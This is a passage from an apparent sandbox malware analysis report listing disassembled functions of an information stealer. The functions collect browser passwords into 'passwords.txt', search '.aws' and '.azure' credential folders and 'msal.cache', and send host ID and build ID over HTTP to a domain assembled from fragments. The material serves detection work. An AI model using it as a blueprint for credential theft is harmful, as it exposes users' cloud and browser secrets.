Instruction Fuzzy Hash: 2A527D71D4001EAACF01FBA2DD429DDB7B5AF04308F51456BB610771A1DBB87E8E8B98

Function 004169B6 Relevance: 38.7, APIs: 8, Strings: 14, Instructions: 249
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004168C6: StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416925
Part of subcall function 004168C6: StrStrA.SHLWAPI(00000000,?), ref: 0041693A
Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416949
Part of subcall function 004168C6: lstrlenA.KERNEL32(00000000), ref: 00416962

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AA0
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AF9
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B59
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BB2
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BC8
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BDE
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BF0
Sleep.KERNEL32(0000EA60), ref: 00416BFF

Strings

sqlite3.dll, xrefs: 00416C9C
ERROR, xrefs: 00416BC0
.vA, xrefs: 00416D1D
sqlite3.dll, xrefs: 00416C68
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0, xrefs: 00416CDF
ERROR, xrefs: 00416AF1
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0, xrefs: 00416CAE
ERROR, xrefs: 00416B51
sqlp.dll, xrefs: 00416CCD
ERROR, xrefs: 00416A98
ERROR, xrefs: 00416BAA
sqlp.dll, xrefs: 00416CFE
ERROR, xrefs: 00416BE8
ERROR, xrefs: 00416BD6

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$Sleep
String ID: .vA$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sqlite3.dll$sqlite3.dll$sqlp.dll$sqlp.dll
API String ID: 2840494320-4129404369
Opcode ID: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
Instruction ID: 3295cb3038e640ef7bf1334207e300efc9412b34fd4a8ee3f001cefdb945b7ae
Opcode Fuzzy Hash: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
Instruction Fuzzy Hash: A9915F31E40119ABCF10FBA6ED47ACC7770AF04308F51502BF915B7191DBB8AE898B98

Function 0040852E Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 230
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

CopyFileA.KERNEL32(?,?,00000001,00437198,004367C6,?,?,?), ref: 004085D3
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408628
RtlAllocateHeap.NTDLL(00000000), ref: 0040862F
lstrlenA.KERNEL32(?), ref: 004086CB
lstrcatA.KERNEL32(?), ref: 004086E4
lstrcatA.KERNEL32(?,?), ref: 004086EE
lstrcatA.KERNEL32(?,0043719C), ref: 004086FA
lstrcatA.KERNEL32(?,?), ref: 00408704
lstrcatA.KERNEL32(?,004371A0), ref: 00408710
lstrcatA.KERNEL32(?), ref: 0040871D
lstrcatA.KERNEL32(?,?), ref: 00408727
lstrcatA.KERNEL32(?,004371A4), ref: 00408733
lstrcatA.KERNEL32(?), ref: 00408740
lstrcatA.KERNEL32(?,?), ref: 0040874A
lstrcatA.KERNEL32(?,004371A8), ref: 00408756
lstrcatA.KERNEL32(?), ref: 00408763
lstrcatA.KERNEL32(?,?), ref: 0040876D
lstrcatA.KERNEL32(?,004371AC), ref: 00408779
lstrcatA.KERNEL32(?,004371B0), ref: 00408785
lstrlenA.KERNEL32(?), ref: 004087BE
DeleteFileA.KERNEL32(?), ref: 0040880B

Strings

passwords.txt, xrefs: 004087CE

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID: passwords.txt
API String ID: 1956182324-347816968
Opcode ID: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
Instruction ID: 9a12f6b0eacbcb2ed4cda68e664cf834d7366407d3e9ed4d657f0b87806d2d42
Opcode Fuzzy Hash: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
Instruction Fuzzy Hash: A2814032900208AFCF05FFA1EE4A9CD7B76BF08316F205026F501B31A1EB7A5E559B59

Function 00404B2E Relevance: 35.4, APIs: 12, Strings: 8, Instructions: 378
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
StrCmpCA.SHLWAPI(?), ref: 00404BEB
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404D83
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00404DC7
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404DF5

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

lstrlenA.KERNEL32(?,00436953,",build_id,004377C4,------,004377B8,",hwid,004377A4,------), ref: 004050EE
lstrlenA.KERNEL32(?,?,00000000), ref: 00405101
HttpSendRequestA.WININET(00000000,?,00000000), ref: 0040510F
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040516C
InternetCloseHandle.WININET(00000000), ref: 00405177
InternetCloseHandle.WININET(?), ref: 0040518E
InternetCloseHandle.WININET(?), ref: 0040519A

Strings

", xrefs: 00404ED9
8wA, xrefs: 00405222
------, xrefs: 00404F5B
build_id, xrefs: 0040500D
", xrefs: 00405039
------, xrefs: 00404DFB
hwid, xrefs: 00404EAD
------, xrefs: 00404C75

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
String ID: "$"$------$------$------$8wA$build_id$hwid
API String ID: 3006978581-858375883
Opcode ID: b105060c4e4bbf32865d800b87946fda209dabeebbd94f0e8d26b4a58616715d
Instruction ID: 7219792e9a540e442724c4d24598c6325e7ae8fa207a63d5b21e459a2de286cb
Opcode Fuzzy Hash: b105060c4e4bbf32865d800b87946fda209dabeebbd94f0e8d26b4a58616715d
Instruction Fuzzy Hash: C002C371D5512A9ACF20EB21CD46ADDB7B5FF04308F4140E6A54873191DAB87ECA8FD8

Function 00401666 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129memoryfileCOMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00401696
wsprintfW.USER32 ref: 004016BC
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 004016E6
GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004016FE
RtlAllocateHeap.NTDLL(00000000), ref: 00401705
_time64.MSVCRT ref: 0040170E
srand.MSVCRT ref: 00401715
rand.MSVCRT ref: 0040171E
_memset.LIBCMT ref: 0040172E
WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00401746
_memset.LIBCMT ref: 00401763
CloseHandle.KERNEL32(?), ref: 00401771
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040178D
ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 004017A9
_memset.LIBCMT ref: 004017BE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004017C8
RtlFreeHeap.NTDLL(00000000), ref: 004017CF
CloseHandle.KERNEL32(?), ref: 004017DB

Strings

%s%s, xrefs: 004016B6
delays.tmp, xrefs: 004016A4

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
String ID: %s%s$delays.tmp
API String ID: 1620473967-1413376734
Opcode ID: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
Instruction ID: 11c0bd3ed3d7e6805384e8c578cb98533790a078e52b8311c5bcc7c05517a4c3
Opcode Fuzzy Hash: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
Instruction Fuzzy Hash: 2B41C8B1900218ABD7205F61AC4CF9F7B7DEB89715F1006BAF109E10A1DA354E54CF28

Function 004164BD Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 114stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004164E2

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416501
lstrcatA.KERNEL32(?,\.azure\), ref: 0041651E

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170

_memset.LIBCMT ref: 00416556
lstrcatA.KERNEL32(?,00000000), ref: 00416578
lstrcatA.KERNEL32(?,\.aws\), ref: 00416595

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313

_memset.LIBCMT ref: 004165CA
lstrcatA.KERNEL32(?,00000000), ref: 004165EC
lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00416609
_memset.LIBCMT ref: 0041663E

Strings

\.aws\, xrefs: 00416589
*.*, xrefs: 004165AA
Azure\.azure, xrefs: 00416531
msal.cache, xrefs: 0041661E
Azure\.aws, xrefs: 004165A5
\.IdentityService\, xrefs: 004165FD
Azure\.IdentityService, xrefs: 00416619
\.azure\, xrefs: 00416512
*.*, xrefs: 00416536

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$_memsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 4216275855-974132213
Opcode ID: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
Instruction ID: c1663bc4ae337e97e36098b0a6fa5269247debf2670cee4f463a309fb8bc2b96
Opcode Fuzzy Hash: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
Instruction Fuzzy Hash: 2741C671D4021C7BDB14EB61EC47FDD7378AB09308F5044AAB605B7090EAB9AB888F59

Function 0040ABE5 Relevance: 33.3, APIs: 22, Instructions: 315stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

CopyFileA.KERNEL32(?,?,00000001,004373D0,00436812,?,?,?), ref: 0040AC8A
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040AD94
RtlAllocateHeap.NTDLL(00000000), ref: 0040AD9B
StrCmpCA.SHLWAPI(?,004373DC,00000000), ref: 0040AE4C
StrCmpCA.SHLWAPI(?,004373E0), ref: 0040AE74
lstrcatA.KERNEL32(00000000,?), ref: 0040AE98
lstrcatA.KERNEL32(00000000,004373E4), ref: 0040AEA4
lstrcatA.KERNEL32(00000000,?), ref: 0040AEAE
lstrcatA.KERNEL32(00000000,004373E8), ref: 0040AEBA
lstrcatA.KERNEL32(00000000,?), ref: 0040AEC4
lstrcatA.KERNEL32(00000000,004373EC), ref: 0040AED0
lstrcatA.KERNEL32(00000000,?), ref: 0040AEDA
lstrcatA.KERNEL32(00000000,004373F0), ref: 0040AEE6
lstrcatA.KERNEL32(00000000,?), ref: 0040AEF0
lstrcatA.KERNEL32(00000000,004373F4), ref: 0040AEFC
lstrcatA.KERNEL32(00000000,?), ref: 0040AF06
lstrcatA.KERNEL32(00000000,004373F8), ref: 0040AF12
lstrcatA.KERNEL32(00000000,?), ref: 0040AF1C
lstrcatA.KERNEL32(00000000,004373FC), ref: 0040AF28
lstrlenA.KERNEL32(00000000), ref: 0040AF7A
lstrlenA.KERNEL32(?), ref: 0040AF95
DeleteFileA.KERNEL32(?), ref: 0040AFD8

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
Instruction ID: ea3aaa4254ea011307d5ff1151e45a3af1a32ea2cb92a891b43a4b7d07102f87
Opcode Fuzzy Hash: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
Instruction Fuzzy Hash: E6C15D32904208AFDF15EFA1ED4A9DD7B76EF04309F20102AF501B30A1DB7A6E959F95

Function 00417041 Relevance: 29.0, APIs: 8, Strings: 8, Instructions: 1029networksleepCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

CloseHandle.KERNEL32(00000000,?,?,?,?,0041858F), ref: 004170DD
OpenEventA.KERNEL32(001F0003,00000000,?,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004170EC
CreateDirectoryA.KERNEL32(?,00000000,004366DA), ref: 0041760A
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176CB
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176E4

Part of subcall function 00404B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
Part of subcall function 00404B2E: StrCmpCA.SHLWAPI(?), ref: 00404BEB

Part of subcall function 004139C2: StrCmpCA.SHLWAPI(?,block,?,?,00417744), ref: 004139D7
Part of subcall function 004139C2: ExitProcess.KERNEL32 ref: 004139E2

Part of subcall function 00405F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
Part of subcall function 00405F39: StrCmpCA.SHLWAPI(?), ref: 00405FF6

Part of subcall function 00413198: strtok_s.MSVCRT ref: 004131B7
Part of subcall function 00413198: strtok_s.MSVCRT ref: 0041323A

Sleep.KERNEL32(000003E8), ref: 00417A9A

Part of subcall function 00405F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
Part of subcall function 00405F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
Part of subcall function 00405F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200

CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,0041858F), ref: 00417100

Part of subcall function 0041257F: __EH_prolog3_catch_GS.LIBCMT ref: 00412589
Part of subcall function 0041257F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
Part of subcall function 0041257F: Process32First.KERNEL32(00000000,00000128), ref: 004125B8
Part of subcall function 0041257F: Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
Part of subcall function 0041257F: StrCmpCA.SHLWAPI(?), ref: 004125DC
Part of subcall function 0041257F: CloseHandle.KERNEL32(00000000), ref: 004125F0

CloseHandle.KERNEL32(?), ref: 00418000

Strings

_DEBUG.zip, xrefs: 00417F35
.exe, xrefs: 00417E04
.exe, xrefs: 00417549
cowod., xrefs: 00417E7B
hopto, xrefs: 00417E9F
6c8ce6f422a1d9cf34f23d1c2168e754, xrefs: 0041770C
http://, xrefs: 00417E57
org, xrefs: 00417EE7

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
